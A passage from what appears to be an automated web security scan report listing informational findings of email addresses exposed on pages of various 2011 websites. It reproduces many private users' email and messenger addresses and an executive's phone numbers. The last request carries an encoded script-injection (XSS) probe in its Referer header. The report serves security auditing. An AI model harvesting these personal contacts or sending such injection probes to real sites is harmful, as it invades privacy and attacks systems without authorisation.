HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:17:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=4f21c713b0ac25379dbcc70fb1ecd280; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:17:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 65133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='ymsgr:sendIM?Alexx.Lorenzoo@yahoo.com'>Alexx.Lorenzoo@yahoo.com</a>
...[SNIP]...

19.31. http://community.invisionpower.com/user/189809-4ipbcom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/189809-4ipbcom/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /user/189809-4ipbcom/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:17:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=6b5985aaf72f2bb65cacd3df659e6314; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:17:23 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 65668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=a7madzaied@hotmail.com'>a7madzaied@hotmail.com</a>
...[SNIP]...
<a class='url' href='ymsgr:sendIM?Smart_475@yahoo.com'>Smart_475@yahoo.com</a>
...[SNIP]...

19.32. http://community.invisionpower.com/user/46326-nidoking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/46326-nidoking/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/46326-nidoking/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:35:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a44983cd7884fd4861089fbe87afad9a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:35:31 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=jmostarda@live.com'>jmostarda@live.com</a>
...[SNIP]...

19.33. http://community.invisionpower.com/user/49-charles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/49-charles/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/49-charles/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:27:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1e954fca2b9b6a8ce75b8f9a92fd1339; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:27:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 59979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<meta name="description" content="Charles: Charles Warner
Invision Power Services, Inc. - President
charles.warner@invisionpower.com - 1-800-901-5491 (804-200-5695)
AIM: charlesips Twitter: @charleswarner" />
...[SNIP]...

19.34. http://community.invisionpower.com/user/659-blush/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/659-blush/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/659-blush/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:35:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d19616c6f97e1b2aa22aff16a5bb94ef; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:36:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 36380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=galactophagist@hotmail.com'>galactophagist@hotmail.com</a>
...[SNIP]...

19.35. http://community.invisionpower.com/user/74840-dr-jekyll/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/74840-dr-jekyll/

Issue detail

The following email address was disclosed in the response:

Request

GET /user/74840-dr-jekyll/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:30:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=6ebb14c2baf717c77955421ce0a3559a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:30:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 63746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=dr_jekyll@hotmail.it'>dr_jekyll@hotmail.it</a>
...[SNIP]...

19.36. http://community.invisionpower.com/user/79427-zbahadir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/79427-zbahadir/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /user/79427-zbahadir/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:19:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=2990dc74e50b88eb1a8e79dfaab7be2a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:19:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 42134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=zbahadir@msn.com'>zbahadir@msn.com</a>
...[SNIP]...
<a class='url' href='ymsgr:sendIM?zbahadir@yahoo.com'>zbahadir@yahoo.com</a>
...[SNIP]...

19.37. http://community.invisionpower.com/user/79705-sephi-kun/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /user/79705-sephi-kun/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /user/79705-sephi-kun/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:37:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a04519de026643b42d281c645615bf85; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:37:22 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 35779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a class='url' href='msnim:chat?contact=sephiroth0092@hotmail.com'>sephiroth0092@hotmail.com</a>
...[SNIP]...
<a class='url' href='ymsgr:sendIM?sephiroth0092@yahoo.fr'>sephiroth0092@yahoo.fr</a>
...[SNIP]...

19.38. http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://english.vietnamnet.vn
Path:   /en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html HTTP/1.1
Host: english.vietnamnet.vn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:01:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58692
X-Cache: MISS from Cache-48
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<br />
Tel: 04.37722792 Fax: 04.37722882, Email: evnn@vietnamnet.vn
</div>
...[SNIP]...

19.39. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<a href="mailto:editorial@fis.com">editorial@fis.com</a>
...[SNIP]...

19.40. http://groups.google.com/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The following email address was disclosed in the response:

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=631694ff1b7a6154:TM=1296694969:LM=1296694970:S=4NhZ0w32Gl9oo3YP; expires=Sat, 02-Feb-2013 01:02:50 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
<span dir=ltr>Janus janus.nos...@magma.ca sci med diseases osteoporosis John Allen wrote: Can </span>
...[SNIP]...

19.41. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The following email address was disclosed in the response:

Request

GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:02:54 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="mailto:info@insidejapantours.com">info@insidejapantours.com</a>
...[SNIP]...
<a href="mailto:info@insidejapantours.com">info@insidejapantours.com</a>
...[SNIP]...

19.42. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 02 Feb 2011 22:11:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

19.43. http://lovely-faces.com/lib/js/ModalPopups.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lovely-faces.com
Path:   /lib/js/ModalPopups.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/js/ModalPopups.js HTTP/1.1
Host: lovely-faces.com
Proxy-Connection: keep-alive
Referer: http://lovely-faces.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d2m29fhd3k250v7inbf5p7la41

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 20:21:13 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 21:38:18 GMT
ETag: "1c05cb6-8db3-499c122ce5739"
Accept-Ranges: bytes
Content-Length: 36275
Content-Type: application/x-javascript

.../****************************************************************
* *
* ModalPopups
...[SNIP]...
ight (c) 2008 Jan Stolk *
* *
* Website: http://www.modalpopups.com *
* E-Mail: stolk_jan@hotmail.com *
* *
* *
* This library is free software; y
...[SNIP]...

19.44. http://m.usa.visa.com/m/legal.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.usa.visa.com
Path:   /m/legal.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /m/legal.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 6444
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001ucYXfUVlCbmqykdFFUeFDI2:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<a href="mailto:askvisausa@visa.com" title="mailto:askvisausa@visa.com" class="link-global">mailto:askvisausa@visa.com</a>
...[SNIP]...

19.45. http://mir.aculo.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mir.aculo.us
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: mir.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Wed, 02 Feb 2011 22:02:05 GMT
Content-Type: text/html
Content-Length: 42082
Last-Modified: Wed, 02 Feb 2011 21:53:00 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:thomas@fesch.at">
...[SNIP]...

19.46. http://news.google.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news

Issue detail

The following email address was disclosed in the response:

Request

GET /news?pz=1&cf=all&ned=us&hl=en&q=bluefin+tuna&output=rss HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: application/xml; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:59 GMT
Expires: Thu, 03 Feb 2011 01:03:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<rss version="2.0"><channel><generator>NFE/1.0</generator><title>bluefin tuna - Google News</title><link>http://news.google.com/news?pz=1&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna</link><language>en</la
...[SNIP]...
<webMaster>news-feedback@google.com</webMaster>
...[SNIP]...

19.47. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The following email address was disclosed in the response:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="#">TBD@wsj.com</a>
...[SNIP]...

19.48. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a class="" href="mailto:christopher.rhoads@wsj.com">christopher.rhoads@wsj.com</a>
...[SNIP]...
<a class="" href="mailto:paul.sonne@wsj.com">paul.sonne@wsj.com</a>
...[SNIP]...
<a class="" href="mailto:geoffrey.fowler@wsj.com">geoffrey.fowler@wsj.com</a>
...[SNIP]...
<a href="#">TBD@wsj.com</a>
...[SNIP]...

19.49. http://search.wachovia.com/selfservice/jslib/CalendarPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/jslib/CalendarPopup.js

Issue detail

The following email address was disclosed in the response:

Request

GET /selfservice/jslib/CalendarPopup.js HTTP/1.1
Host: search.wachovia.com
Proxy-Connection: keep-alive
Referer: http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?9c128%22%3E%3Cscript%3Ealert(1)%3C/script%3E0f891e45ab3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
